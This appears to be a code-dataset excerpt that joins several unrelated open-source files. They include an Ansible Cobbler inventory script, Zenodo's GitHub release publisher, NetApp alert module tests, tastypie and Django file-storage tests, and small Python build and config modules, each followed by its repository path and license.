self.size = struct.calcsize('L')
def set(self, i, bound, msg):
if type(i) != IntType:
raise TypeError, '%s.set: argument must be an integer' % \
self.__class__.__name__
if not 0 <= i <= bound:
raise error, msg % self.__class__.__name__
self.data = struct.pack('L', i)
def set_from_data(self, data):
if type(data) != StringType:
raise TypeError, \
'%s.set_from_data: argument must be a string' % \
self.__class__.__name__
try:
struct.unpack('L', data)[0]
except:
raise TypeError, '%s.set_from_data: invalid data' % \
self.__class__.__name__
self.data = data
def get(self):
if self.data == None:
return None
return struct.unpack('L', self.data)[0]
class hoplimit(SocketOptionInteger):
"""HOPLIMIT objects are defined to handle hoplimit option
hoplimit() -> HOPLIMIT object
Create a new HOPLIMIT object
Methods of HOPLIMIT objects:
set(string, int) -- initialize a hop limit option
set_from_data(string) -- initialize a hop limit option from raw data
get() -- return hop limit
Attributes of HOPLIMIT objects:
data -- HOPLIMIT object as a raw string
size -- size in bytes of `hoplimit' option (not HOPLIMIT object)"""
def __init__(self):
SocketOptionInteger.__init__(self)
def set(self, i):
"""set(int) -> None
Initialize HOPLIMIT object. Arg1 is hop limit.
Return None."""
SocketOptionInteger.set(self, i, 0xff, '%s: invalid hop limit')
def set_from_data(self, data):
"""set_from_data(string) -> None
Initialize HOPLIMIT object from raw data (arg1).
Return None."""
SocketOptionInteger.set_from_data(self, data)
def get(self):
"""get() -> int
Return hop limit."""
return SocketOptionInteger.get(self)
class tclass(SocketOptionInteger):
"""TCLASS objects are defined to handle traffic class option
tclass() -> TCLASS object
Create a new TCLASS object
Methods of TCLASS objects:
set(string, int) -- initialize a traffic class option
set_from_data(string) -- initialize a traffic class option from raw data
get() -- return traffic class
Attributes of TCLASS objects:
data -- TCLASS object as a raw string
size -- size in bytes of `tclass' option (not TCLASS object)"""
def __init__(self):
SocketOptionInteger.__init__(self)
def set(self, i):
"""set(int) -> None
Initialize TCLASS object. Arg1 is traffic class.
Return None."""
SocketOptionInteger.set(self, i, 0xff,
'%s: invalid traffic class value')
def set_from_data(self, data):
"""set_from_data(string) -> None
Initialize TCLASS object from raw data (arg1).
Return None."""
SocketOptionInteger.set_from_data(self, data)
def get(self):
"""get() -> int
Return traffic class."""
return SocketOptionInteger.get(self)
| gpl-2.0 |
KohlsTechnology/ansible | contrib/inventory/cobbler.py | 8 | 10592 | #!/usr/bin/env python
"""
Cobbler external inventory script
=================================
Ansible has a feature where instead of reading from /etc/ansible/hosts
as a text file, it can query external programs to obtain the list
of hosts, groups the hosts are in, and even variables to assign to each host.
To use this, copy this file over /etc/ansible/hosts and chmod +x the file.
This, more or less, allows you to keep one central database containing
info about all of your managed instances.
This script is an example of sourcing that data from Cobbler
(https://cobbler.github.io). With cobbler each --mgmt-class in cobbler
will correspond to a group in Ansible, and --ks-meta variables will be
passed down for use in templates or even in argument lines.
NOTE: The cobbler system names will not be used. Make sure a
cobbler --dns-name is set for each cobbler system. If a system
appears with two DNS names we do not add it twice because we don't want
ansible talking to it twice. The first one found will be used. If no
--dns-name is set the system will NOT be visible to ansible. We do
not add cobbler system names because there is no requirement in cobbler
that those correspond to addresses.
Tested with Cobbler 2.0.11.
Changelog:
- 2015-06-21 dmccue: Modified to support run-once _meta retrieval, results in
higher performance at ansible startup. Groups are determined by owner rather than
default mgmt_classes. DNS name determined from hostname. cobbler values are written
to a 'cobbler' fact namespace
- 2013-09-01 pgehres: Refactored implementation to make use of caching and to
limit the number of connections to external cobbler server for performance.
Added use of cobbler.ini file to configure settings. Tested with Cobbler 2.4.0
"""
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
######################################################################
import argparse
import ConfigParser
import os
import re
from time import time
import xmlrpclib
try:
import json
except ImportError:
import simplejson as json
from six import iteritems
# NOTE -- this file assumes Ansible is being accessed FROM the cobbler
# server, so it does not attempt to login with a username and password.
# this will be addressed in a future version of this script.
orderby_keyname = 'owners' # alternatively 'mgmt_classes'
class CobblerInventory(object):
def __init__(self):
""" Main execution path """
self.conn = None
self.inventory = dict() # A list of groups and the hosts in that group
self.cache = dict() # Details about hosts in the inventory
# Read settings and parse CLI arguments
self.read_settings()
self.parse_cli_args()
# Cache
if self.args.refresh_cache:
self.update_cache()
elif not self.is_cache_valid():
self.update_cache()
else:
self.load_inventory_from_cache()
self.load_cache_from_cache()
data_to_print = ""
# Data to print
if self.args.host:
data_to_print += self.get_host_info()
else:
self.inventory['_meta'] = {'hostvars': {}}
for hostname in self.cache:
self.inventory['_meta']['hostvars'][hostname] = {'cobbler': self.cache[hostname]}
data_to_print += self.json_format_dict(self.inventory, True)
print(data_to_print)
def _connect(self):
if not self.conn:
self.conn = xmlrpclib.Server(self.cobbler_host, allow_none=True)
self.token = None
if self.cobbler_username is not None:
self.token = self.conn.login(self.cobbler_username, self.cobbler_password)
def is_cache_valid(self):
""" Determines if the cache files have expired, or if it is still valid """
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
if os.path.isfile(self.cache_path_inventory):
return True
return False
def read_settings(self):
""" Reads the settings from the cobbler.ini file """
config = ConfigParser.SafeConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/cobbler.ini')
self.cobbler_host = config.get('cobbler', 'host')
self.cobbler_username = None
self.cobbler_password = None
if config.has_option('cobbler', 'username'):
self.cobbler_username = config.get('cobbler', 'username')
if config.has_option('cobbler', 'password'):
self.cobbler_password = config.get('cobbler', 'password')
# Cache related
cache_path = config.get('cobbler', 'cache_path')
self.cache_path_cache = cache_path + "/ansible-cobbler.cache"
self.cache_path_inventory = cache_path + "/ansible-cobbler.index"
self.cache_max_age = config.getint('cobbler', 'cache_max_age')
def parse_cli_args(self):
""" Command line argument processing """
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Cobbler')
parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests to cobbler (default: False - use cache files)')
self.args = parser.parse_args()
def update_cache(self):
""" Make calls to cobbler and save the output in a cache """
self._connect()
self.groups = dict()
self.hosts = dict()
if self.token is not None:
data = self.conn.get_systems(self.token)
else:
data = self.conn.get_systems()
for host in data:
# Get the FQDN for the host and add it to the right groups
dns_name = host['hostname'] # None
ksmeta = None
interfaces = host['interfaces']
# hostname is often empty for non-static IP hosts
if dns_name == '':
for (iname, ivalue) in iteritems(interfaces):
if ivalue['management'] or not ivalue['static']:
this_dns_name = ivalue.get('dns_name', None)
if this_dns_name is not None and this_dns_name is not "":
dns_name = this_dns_name
if dns_name == '' or dns_name is None:
continue
status = host['status']
profile = host['profile']
classes = host[orderby_keyname]
if status not in self.inventory:
self.inventory[status] = []
self.inventory[status].append(dns_name)
if profile not in self.inventory:
self.inventory[profile] = []
self.inventory[profile].append(dns_name)
for cls in classes:
if cls not in self.inventory:
self.inventory[cls] = []
self.inventory[cls].append(dns_name)
# Since we already have all of the data for the host, update the host details as well
# The old way was ksmeta only -- provide backwards compatibility
self.cache[dns_name] = host
if "ks_meta" in host:
for key, value in iteritems(host["ks_meta"]):
self.cache[dns_name][key] = value
self.write_to_cache(self.cache, self.cache_path_cache)
self.write_to_cache(self.inventory, self.cache_path_inventory)
def get_host_info(self):
""" Get variables about a specific host """
if not self.cache or len(self.cache) == 0:
# Need to load index from cache
self.load_cache_from_cache()
if self.args.host not in self.cache:
# try updating the cache
self.update_cache()
if self.args.host not in self.cache:
# host might not exist anymore
return self.json_format_dict({}, True)
return self.json_format_dict(self.cache[self.args.host], True)
def push(self, my_dict, key, element):
""" Pushed an element onto an array that may not have been defined in the dict """
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def load_inventory_from_cache(self):
""" Reads the index from the cache file sets self.index """
cache = open(self.cache_path_inventory, 'r')
json_inventory = cache.read()
self.inventory = json.loads(json_inventory)
def load_cache_from_cache(self):
""" Reads the cache from the cache file sets self.cache """
cache = open(self.cache_path_cache, 'r')
json_cache = cache.read()
self.cache = json.loads(json_cache)
def write_to_cache(self, data, filename):
""" Writes data in JSON format to a file """
json_data = self.json_format_dict(data, True)
cache = open(filename, 'w')
cache.write(json_data)
cache.close()
def to_safe(self, word):
""" Converts 'bad' characters in a string to underscores so they can be used as Ansible groups """
return re.sub(r"[^A-Za-z0-9\-]", "_", word)
def json_format_dict(self, data, pretty=False):
""" Converts a dict to a JSON object and dumps it as a formatted string """
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
CobblerInventory()
| gpl-3.0 |
mithrandir123/director | src/python/ddapp/meshmanager.py | 5 | 1538 | from ddapp import lcmobjectcollection
from ddapp import geometryencoder
from ddapp import ioUtils
from ddapp.uuidutil import newUUID
import os
class MeshManager(object):
def __init__(self):
self.meshes = {}
self.cacheDirectory = '/tmp'
self.cacheDataType = 'stl'
self.collection = lcmobjectcollection.LCMObjectCollection(channel='MESH_COLLECTION_COMMAND')
self.collection.connectDescriptionUpdated(self._onDescriptionUpdated)
def add(self, polyData, publish=True):
meshId = newUUID()
self.meshes[meshId] = polyData
if publish:
self.collection.updateDescription(dict(uuid=meshId, data=geometryencoder.encodePolyData(polyData)), notify=False)
return meshId
def get(self, meshId):
return self.meshes.get(meshId)
def getFilesystemFilename(self, meshId):
if meshId in self.meshes:
filename = os.path.join(self.cacheDirectory, '%s.%s' % (meshId, self.cacheDataType))
if not os.path.isfile(filename):
ioUtils.writePolyData(self.get(meshId), filename)
return filename
return None
def _onDescriptionUpdated(self, collection, descriptionId):
desc = collection.getDescription(descriptionId)
meshId = desc['uuid']
if meshId not in self.meshes:
polyData = geometryencoder.decodePolyData(desc['data'])
self.meshes[meshId] = polyData
#print 'decoded polydata with %d points' % polyData.GetNumberOfPoints()
| bsd-3-clause |
ddico/sale-workflow | sale_order_add_variants/model/res_config.py | 28 | 1241 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Hugo Santos
# Copyright 2015 FactorLibre
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields
class SaleConfiguration(models.TransientModel):
_inherit = 'sale.config.settings'
group_sale_add_variants = fields.Boolean(
string='Allow to add variants from template in Sale order',
implied_group='sale_order_add_variants.group_sale_add_variants')
| agpl-3.0 |
windinthew/audacity | lib-src/lv2/suil/waflib/Tools/dmd.py | 316 | 1511 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log([conf.env.D,'--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log([conf.env.D,'-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v['DFLAGS']=['-d-version=Posix']
v['LINKFLAGS']=[]
v['DFLAGS_dshlib']=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v['D_SRC_F']=['-c']
v['D_TGT_F']='-of%s'
v['D_LINKER']=v['D']
v['DLNK_SRC_F']=''
v['DLNK_TGT_F']='-of%s'
v['DINC_ST']='-I%s'
v['DSHLIB_MARKER']=v['DSTLIB_MARKER']=''
v['DSTLIB_ST']=v['DSHLIB_ST']='-L-l%s'
v['DSTLIBPATH_ST']=v['DLIBPATH_ST']='-L-L%s'
v['LINKFLAGS_dprogram']=['-quiet']
v['DFLAGS_dshlib']=['-fPIC']
v['LINKFLAGS_dshlib']=['-L-shared']
v['DHEADER_ext']='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v['D_HDR_F']='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log([conf.env.D,'--help'])
if out.find("D Compiler v2.")>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
| gpl-2.0 |
backslash112/django-tastypie | tests/slashless/tests.py | 19 | 2007 | from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import HttpRequest
import json
from testcases import TestCaseWithFixture
class ViewsWithoutSlashesTestCase(TestCaseWithFixture):
urls = 'slashless.api.urls'
def setUp(self):
super(ViewsWithoutSlashesTestCase, self).setUp()
self.old_debug = settings.DEBUG
settings.DEBUG = True
def tearDown(self):
settings.DEBUG = self.old_debug
super(ViewsWithoutSlashesTestCase, self).tearDown()
def test_gets_without_trailing_slash(self):
resp = self.client.get('/api/v1', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 2)
self.assertEqual(deserialized['notes'], {'list_endpoint': '/api/v1/notes', 'schema': '/api/v1/notes/schema'})
resp = self.client.get('/api/v1/notes', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 2)
self.assertEqual(deserialized['meta']['limit'], 20)
self.assertEqual(len(deserialized['objects']), 2)
self.assertEqual([obj['title'] for obj in deserialized['objects']], [u'First Post!', u'Another Post'])
resp = self.client.get('/api/v1/notes/1', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
self.assertEqual(len(deserialized), 9)
self.assertEqual(deserialized['title'], u'First Post!')
resp = self.client.get('/api/v1/notes/set/2;1', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
deserialized = json.loads(resp.content.decode('utf-8'))
obj_ids = [o["id"] for o in deserialized["objects"]]
self.assertEqual(sorted(obj_ids), [1,2])
| bsd-3-clause |
tiborsimko/zenodo | zenodo/modules/github/api.py | 1 | 4767 | # -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Zenodo GitHub API."""
from __future__ import absolute_import
import uuid
from flask import current_app
from invenio_db import db
from invenio_files_rest.models import ObjectVersion
from invenio_github.api import GitHubRelease
from invenio_github.utils import get_contributors, get_owner
from invenio_indexer.api import RecordIndexer
from zenodo.modules.deposit.tasks import datacite_register
from ..deposit.loaders import legacyjson_v1_translator
from ..jsonschemas.utils import current_jsonschemas
class ZenodoGitHubRelease(GitHubRelease):
"""Zenodo GitHub Release."""
@property
def metadata(self):
"""Return extracted metadata."""
output = dict(self.defaults)
output.update(self.extra_metadata)
# Add creators if not specified
if 'creators' not in output:
output['creators'] = get_contributors(self.gh.api,
self.repository['id'])
if not output['creators']:
output['creators'] = get_owner(self.gh.api, self.author)
if not output['creators']:
output['creators'] = [dict(name='Unknown', affiliation='')]
return legacyjson_v1_translator({'metadata': output})
@property
def repo_model(self):
"""Return repository model from relationship."""
return self.model.repository
def publish(self):
"""Publish GitHub release as record."""
id_ = uuid.uuid4()
deposit = None
try:
db.session.begin_nested()
deposit = self.deposit_class.create(self.metadata, id_=id_)
deposit['_deposit']['created_by'] = self.event.user_id
deposit['_deposit']['owners'] = [self.event.user_id]
# Fetch the deposit files
for key, url in self.files:
# Make a HEAD request to get GitHub to compute the
# Content-Length.
res = self.gh.api.session.head(url, allow_redirects=True)
# Now, download the file
res = self.gh.api.session.get(url, stream=True)
if res.status_code != 200:
raise Exception(
"Could not retrieve archive from GitHub: {url}"
.format(url=url)
)
size = int(res.headers.get('Content-Length', 0))
ObjectVersion.create(
bucket=deposit.files.bucket,
key=key,
stream=res.raw,
size=size or None,
mimetype=res.headers.get('Content-Type'),
)
# GitHub-specific SIP store agent
sip_agent = {
'$schema': current_jsonschemas.path_to_url(
current_app.config['SIPSTORE_GITHUB_AGENT_JSONSCHEMA']),
'user_id': self.event.user_id,
'github_id': self.release['author']['id'],
'email': self.gh.account.user.email,
}
deposit.publish(user_id=self.event.user_id, sip_agent=sip_agent)
self.model.recordmetadata = deposit.model
db.session.commit()
# Send Datacite DOI registration task
recid_pid, record = deposit.fetch_published()
datacite_register.delay(recid_pid.pid_value, str(record.id))
except Exception:
db.session.rollback()
# Remove deposit from index since it was not commited.
if deposit and deposit.id:
try:
RecordIndexer().delete(deposit)
except Exception:
current_app.logger.exception(
"Failed to remove uncommited deposit from index.")
raise
| gpl-2.0 |
Lujeni/ansible | test/units/modules/storage/netapp/test_netapp_e_alerts.py | 12 | 7474 | # (c) 2018, NetApp Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from ansible.modules.storage.netapp.netapp_e_alerts import Alerts
from units.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
__metaclass__ = type
from units.compat import mock
class AlertsTest(ModuleTestCase):
REQUIRED_PARAMS = {
'api_username': 'rw',
'api_password': 'password',
'api_url': 'http://localhost',
'ssid': '1',
'state': 'disabled'
}
REQ_FUNC = 'ansible.modules.storage.netapp.netapp_e_alerts.request'
def _set_args(self, **kwargs):
module_args = self.REQUIRED_PARAMS.copy()
if kwargs is not None:
module_args.update(kwargs)
set_module_args(module_args)
def _validate_args(self, **kwargs):
self._set_args(**kwargs)
Alerts()
def test_validation_disable(self):
"""Ensure a default configuration succeeds"""
self._validate_args()
def test_validation_enable(self):
"""Ensure a typical, default configuration succeeds"""
self._validate_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'])
def test_validation_fail_required(self):
"""Ensure we fail on missing configuration"""
# Missing recipients
with self.assertRaises(AnsibleFailJson):
self._validate_args(state='enabled', server='localhost', sender='x@y.z')
Alerts()
# Missing sender
with self.assertRaises(AnsibleFailJson):
self._validate_args(state='enabled', server='localhost', recipients=['a@b.c'])
Alerts()
# Missing server
with self.assertRaises(AnsibleFailJson):
self._validate_args(state='enabled', sender='x@y.z', recipients=['a@b.c'])
def test_validation_fail(self):
# Empty recipients
with self.assertRaises(AnsibleFailJson):
self._validate_args(state='enabled', server='localhost', sender='x@y.z', recipients=[])
# Bad sender
with self.assertRaises(AnsibleFailJson):
self._validate_args(state='enabled', server='localhost', sender='y.z', recipients=['a@b.c'])
def test_get_configuration(self):
"""Validate retrieving the current configuration"""
self._set_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'])
expected = 'result'
alerts = Alerts()
# Expecting an update
with mock.patch(self.REQ_FUNC, return_value=(200, expected)) as req:
actual = alerts.get_configuration()
self.assertEqual(expected, actual)
self.assertEqual(req.call_count, 1)
def test_update_configuration(self):
"""Validate updating the configuration"""
initial = dict(alertingEnabled=True,
emailServerAddress='localhost',
sendAdditionalContactInformation=True,
additionalContactInformation='None',
emailSenderAddress='x@y.z',
recipientEmailAddresses=['x@y.z']
)
args = dict(state='enabled', server=initial['emailServerAddress'], sender=initial['emailSenderAddress'],
contact=initial['additionalContactInformation'], recipients=initial['recipientEmailAddresses'])
self._set_args(**args)
alerts = Alerts()
# Ensure when trigger updates when each relevant field is changed
with mock.patch(self.REQ_FUNC, return_value=(200, None)) as req:
with mock.patch.object(alerts, 'get_configuration', return_value=initial):
update = alerts.update_configuration()
self.assertFalse(update)
alerts.sender = 'a@b.c'
update = alerts.update_configuration()
self.assertTrue(update)
self._set_args(**args)
alerts.recipients = ['a@b.c']
update = alerts.update_configuration()
self.assertTrue(update)
self._set_args(**args)
alerts.contact = 'abc'
update = alerts.update_configuration()
self.assertTrue(update)
self._set_args(**args)
alerts.server = 'abc'
update = alerts.update_configuration()
self.assertTrue(update)
def test_send_test_email_check(self):
"""Ensure we handle check_mode correctly"""
self._set_args(test=True)
alerts = Alerts()
alerts.check_mode = True
with mock.patch(self.REQ_FUNC) as req:
with mock.patch.object(alerts, 'update_configuration', return_value=True):
alerts.send_test_email()
self.assertFalse(req.called)
def test_send_test_email(self):
"""Ensure we send a test email if test=True"""
self._set_args(test=True)
alerts = Alerts()
with mock.patch(self.REQ_FUNC, return_value=(200, dict(response='emailSentOK'))) as req:
alerts.send_test_email()
self.assertTrue(req.called)
def test_send_test_email_fail(self):
"""Ensure we fail if the test returned a failure status"""
self._set_args(test=True)
alerts = Alerts()
ret_msg = 'fail'
with self.assertRaisesRegexp(AnsibleFailJson, ret_msg):
with mock.patch(self.REQ_FUNC, return_value=(200, dict(response=ret_msg))) as req:
alerts.send_test_email()
self.assertTrue(req.called)
def test_send_test_email_fail_connection(self):
"""Ensure we fail cleanly if we hit a connection failure"""
self._set_args(test=True)
alerts = Alerts()
with self.assertRaisesRegexp(AnsibleFailJson, r"failed to send"):
with mock.patch(self.REQ_FUNC, side_effect=Exception) as req:
alerts.send_test_email()
self.assertTrue(req.called)
def test_update(self):
# Ensure that when test is enabled and alerting is enabled, we run the test
self._set_args(state='enabled', server='localhost', sender='x@y.z', recipients=['a@b.c'], test=True)
alerts = Alerts()
with self.assertRaisesRegexp(AnsibleExitJson, r"enabled"):
with mock.patch.object(alerts, 'update_configuration', return_value=True):
with mock.patch.object(alerts, 'send_test_email') as test:
alerts.update()
self.assertTrue(test.called)
# Ensure we don't run a test when changed=False
with self.assertRaisesRegexp(AnsibleExitJson, r"enabled"):
with mock.patch.object(alerts, 'update_configuration', return_value=False):
with mock.patch.object(alerts, 'send_test_email') as test:
alerts.update()
self.assertFalse(test.called)
# Ensure that test is not called when we have alerting disabled
self._set_args(state='disabled')
alerts = Alerts()
with self.assertRaisesRegexp(AnsibleExitJson, r"disabled"):
with mock.patch.object(alerts, 'update_configuration', return_value=True):
with mock.patch.object(alerts, 'send_test_email') as test:
alerts.update()
self.assertFalse(test.called)
| gpl-3.0 |
frishberg/django | tests/file_storage/tests.py | 4 | 41685 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, ignore_warnings,
override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import six, timezone
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six.moves.urllib.request import urlopen
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError, "No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class('django.core.files.non_existing_storage.NonExistingStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
